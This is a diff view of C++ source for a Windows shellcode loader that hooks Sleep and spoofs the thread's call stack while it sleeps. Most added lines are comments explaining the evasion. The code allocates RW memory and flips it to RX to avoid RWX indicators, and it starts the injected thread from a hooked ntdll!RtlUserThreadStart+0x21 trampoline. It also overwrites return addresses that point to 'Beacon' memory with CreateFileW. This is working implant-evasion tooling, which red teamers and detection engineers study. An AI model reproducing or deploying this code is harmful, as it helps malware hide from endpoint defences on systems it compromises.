| skipped 7 lines |
8 | 8 | | void WINAPI MySleep(DWORD _dwMilliseconds) |
9 | 9 | | { |
10 | 10 | | const volatile DWORD dwMilliseconds = _dwMilliseconds; |
| 11 | + | |
| 12 | + | // Perform this (current) thread call stack spoofing. |
11 | 13 | | spoofCallStack(true); |
12 | 14 | | |
13 | | - | log("MySleep(", std::dec, dwMilliseconds, ")"); |
| 15 | + | log("\n===> MySleep(", std::dec, dwMilliseconds, ")\n"); |
| 16 | + | |
| 17 | + | // Perform sleep emulating originally hooked functionality. |
14 | 18 | | ::SleepEx(dwMilliseconds, false); |
15 | 19 | | |
| 20 | + | // Restore original thread's call stack. |
16 | 21 | | spoofCallStack(false); |
17 | 22 | | } |
18 | 23 | | |
| skipped 97 lines |
116 | 121 | | |
117 | 122 | | c.ContextFlags = CONTEXT_ALL; |
118 | 123 | | |
| 124 | + | // |
| 125 | + | // It looks like RtlCaptureContext was able to acquire running thread's context, |
| 126 | + | // while GetThreadContext failed at doing so. |
| 127 | + | // |
119 | 128 | | if (hThread == GetCurrentThread() || hThread == 0) |
120 | 129 | | RtlCaptureContext(&c); |
121 | 130 | | else |
| skipped 33 lines |
155 | 164 | | #error "Platform not supported!" |
156 | 165 | | #endif |
157 | 166 | | |
158 | | - | log("WalkCallStack: Stack Trace: "); |
| 167 | + | log("\nWalkCallStack: Stack Trace: "); |
159 | 168 | | |
160 | 169 | | *numOfFrames = 0; |
161 | 170 | | ULONG Frame = 0; |
162 | 171 | | |
163 | 172 | | for (Frame = 0; ; Frame++) |
164 | 173 | | { |
| 174 | + | // |
| 175 | + | // A call to dbghelp!StackWalk64 that will let us iterate over thread's call stack. |
| 176 | + | // |
165 | 177 | | BOOL result = g_stackTraceSpoofing.pStackWalk64( |
166 | 178 | | imageType, |
167 | 179 | | GetCurrentProcess(), |
| skipped 13 lines |
181 | 193 | | { |
182 | 194 | | if (curRecursionCount > 1000) |
183 | 195 | | { |
| 196 | + | // Overly deep recursion spotted, bailing out. |
184 | 197 | | break; |
185 | 198 | | } |
186 | 199 | | curRecursionCount++; |
| skipped 13 lines |
200 | 213 | | if (Frame > maxFrames) |
201 | 214 | | break; |
202 | 215 | | |
203 | | - | if (Frame < Frames_To_Preserve) continue; |
| 216 | + | // |
| 217 | + | // Skip first two frames as they most likely link back to our callers - and thus we can't spoof them: |
| 218 | + | // MySleep(...) -> spoofCallStack(...) -> ... |
| 219 | + | // |
| 220 | + | if (Frame < Frames_To_Preserve) |
| 221 | + | continue; |
204 | 222 | | |
205 | 223 | | bool skipFrame = false; |
206 | 224 | | |
| skipped 3 lines |
210 | 228 | | |
211 | 229 | | if (VirtualQuery((LPVOID)frame.retAddr, &mbi, sizeof(mbi))) |
212 | 230 | | { |
| 231 | + | // |
| 232 | + | // If a frame points back to memory pages that are not MEM_PRIVATE (originating from VirtualAlloc) |
| 233 | + | // we can skip them, as they shouldn't point back to our beacon's memory pages. |
| 234 | + | // Also I've noticed, that for some reason parameter for kernel32!Sleep clobbers stack, making it look like |
| 235 | + | // it's a frame by its own. That address (5 seconds = 5000ms = 0x1388) when queried with VirtualQuery seems to return |
| 236 | + | // mbi.Type == 0. We're using this observation to include such frame in spoofing. |
| 237 | + | // |
213 | 238 | | if (mbi.Type != MEM_PRIVATE && mbi.Type != 0) skipFrame = true; |
214 | 239 | | |
215 | | - | if ((mbi.Protect & PAGE_EXECUTE) != 0 || (mbi.Protect & PAGE_EXECUTE_READ) != 0 || !(mbi.Protect & PAGE_EXECUTE_READWRITE) != 0) { |
216 | | - | } |
217 | | - | else { |
218 | | - | skipFrame = true; |
219 | | - | } |
220 | 240 | | } |
221 | 241 | | |
222 | 242 | | if (frame.retAddr == invalidAddr) skipFrame = true; |
| skipped 7 lines |
230 | 250 | | log("\t", std::dec, Frame, ".\tcalledFrom: 0x", std::setw(8), std::hex, frame.calledFrom, " - stack: 0x", frame.stackAddr, |
231 | 251 | | " - frame: 0x", frame.frameAddr, " - ret: 0x", frame.retAddr, " - skip? ", skipFrame); |
232 | 252 | | } |
233 | | - | |
234 | | - | log("WalkCallStack: Stack Trace finished."); |
235 | 253 | | } |
236 | 254 | | |
237 | 255 | | void spoofCallStack(bool overwriteOrRestore) |
| skipped 1 lines |
239 | 257 | | CallStackFrame frames[MaxStackFramesToSpoof] = { 0 }; |
240 | 258 | | size_t numOfFrames = 0; |
241 | 259 | | |
| 260 | + | // |
| 261 | + | // Firstly we walk through the current thread's call stack collecting all frames |
| 262 | + | // that resemble references to Beacon's allocation pages (or are in any other means anomalous by looking). |
| 263 | + | // |
242 | 264 | | walkCallStack(GetCurrentThread(), frames, _countof(frames), &numOfFrames, true); |
243 | 265 | | |
244 | 266 | | if (overwriteOrRestore) |
| skipped 4 lines |
249 | 271 | | |
250 | 272 | | if (g_stackTraceSpoofing.spoofedFrames < MaxStackFramesToSpoof) |
251 | 273 | | { |
| 274 | + | // |
| 275 | + | // We will use CreateFileW as a fake return address to place onto the thread's frame on stack. |
| 276 | + | // |
252 | 277 | | frame.overwriteWhat = (ULONG_PTR)::CreateFileW; |
| 278 | + | |
| 279 | + | // |
| 280 | + | // We're saving original frame to later use it for call stack restoration. |
| 281 | + | // |
253 | 282 | | g_stackTraceSpoofing.spoofedFrame[g_stackTraceSpoofing.spoofedFrames++] = frame; |
254 | 283 | | } |
255 | 284 | | } |
| skipped 1 lines |
257 | 286 | | for (size_t i = 0; i < g_stackTraceSpoofing.spoofedFrames; i++) |
258 | 287 | | { |
259 | 288 | | auto frame = g_stackTraceSpoofing.spoofedFrame[i]; |
| 289 | + | |
| 290 | + | // |
| 291 | + | // We overwrite thread's frame by writing a function pointer onto the thread's stack precisely where |
| 292 | + | // the function's return address stored. |
| 293 | + | // |
260 | 294 | | *(PULONG_PTR)(frame.frameAddr + sizeof(ULONG_PTR)) = frame.overwriteWhat; |
261 | 295 | | |
262 | 296 | | log("\t\t\tSpoofed: 0x", |
| skipped 6 lines |
269 | 303 | | { |
270 | 304 | | auto frame = g_stackTraceSpoofing.spoofedFrame[i]; |
271 | 305 | | |
| 306 | + | // |
| 307 | + | // Here we restore original return addresses so that our shellcode can continue its execution. |
| 308 | + | // |
272 | 309 | | *(PULONG_PTR)(frame.frameAddr + sizeof(ULONG_PTR)) = frame.retAddr; |
273 | 310 | | |
274 | 311 | | log("\t\t\tRestored: 0x", std::setw(8), std::setfill('0'), std::hex, frame.overwriteWhat, " -> 0x", frame.retAddr); |
| skipped 10 lines |
285 | 322 | | { |
286 | 323 | | memset(&g_stackTraceSpoofing, 0, sizeof(g_stackTraceSpoofing)); |
287 | 324 | | |
| 325 | + | // |
| 326 | + | // Firstly we need to load dbghelp.dll to resolve necessary functions' pointers. |
| 327 | + | // |
288 | 328 | | g_stackTraceSpoofing.hDbghelp = LoadLibraryA("dbghelp.dll"); |
289 | 329 | | if (!g_stackTraceSpoofing.hDbghelp) |
290 | 330 | | return false; |
291 | 331 | | |
| 332 | + | // |
| 333 | + | // Now we resolve addresses of a few required functions. |
| 334 | + | // |
292 | 335 | | g_stackTraceSpoofing.pSymFunctionTableAccess64 = |
293 | 336 | | GetProcAddress(g_stackTraceSpoofing.hDbghelp, "SymFunctionTableAccess64"); |
294 | 337 | | g_stackTraceSpoofing.pSymGetModuleBase64 = |
| skipped 10 lines |
305 | 348 | | ) |
306 | 349 | | return false; |
307 | 350 | | |
| 351 | + | // |
| 352 | + | // Now in order to get StackWalk64 working correctly, we need to call SymInitialize. |
| 353 | + | // |
308 | 354 | | pSymInitialize(GetCurrentProcess(), nullptr, TRUE); |
309 | 355 | | |
310 | 356 | | log("[+] Stack spoofing initialized."); |
| skipped 27 lines |
338 | 384 | | |
339 | 385 | | bool injectShellcode(std::vector<uint8_t>& shellcode, HandlePtr &thread) |
340 | 386 | | { |
| 387 | + | // |
| 388 | + | // Firstly we allocate RW page to avoid RWX-based IOC detections |
| 389 | + | // |
341 | 390 | | auto alloc = ::VirtualAlloc( |
342 | 391 | | NULL, |
343 | 392 | | shellcode.size() + 1, |
| skipped 8 lines |
352 | 401 | | |
353 | 402 | | DWORD old; |
354 | 403 | | |
| 404 | + | // |
| 405 | + | // Then we change that protection to RX |
| 406 | + | // |
355 | 407 | | if (!VirtualProtect(alloc, shellcode.size() + 1, Shellcode_Memory_Protection, &old)) |
356 | 408 | | return false; |
357 | 409 | | |
| 410 | + | |
| 411 | + | // |
| 412 | + | // In order for our thread to blend in more effectively, we start it from the ntdll!RtlUserThreadStart+0x21 |
| 413 | + | // function that is hooked by placing a trampoline call into our shellcode. After a second, the function will be |
| 414 | + | // unhooked to remove easy leftovers (IOCs) and maintain process' stability. |
| 415 | + | // |
358 | 416 | | LPVOID fakeAddr = (LPVOID)(((ULONG_PTR)GetProcAddress(GetModuleHandleA("ntdll"), "RtlUserThreadStart")) + 0x21); |
359 | 417 | | |
360 | 418 | | BYTE origRtlUserThreadStartBytes[16]; |
| skipped 4 lines |
365 | 423 | | return false; |
366 | 424 | | |
367 | 425 | | shellcode.clear(); |
| 426 | + | |
| 427 | + | // |
| 428 | + | // The shellcode starts from the hooked ntdll!RtlUserThreadStart+0x21 |
| 429 | + | // |
368 | 430 | | thread.reset(::CreateThread( |
369 | 431 | | NULL, |
370 | 432 | | 0, |
| skipped 5 lines |
376 | 438 | | |
377 | 439 | | ::SleepEx(1000, false); |
378 | 440 | | |
| 441 | + | // Here we restore original stub bytes of that API. |
379 | 442 | | if (!fastTrampoline(false, (BYTE*)fakeAddr, alloc, &buffers)) |
380 | 443 | | return false; |
381 | 444 | | |
| skipped 55 lines |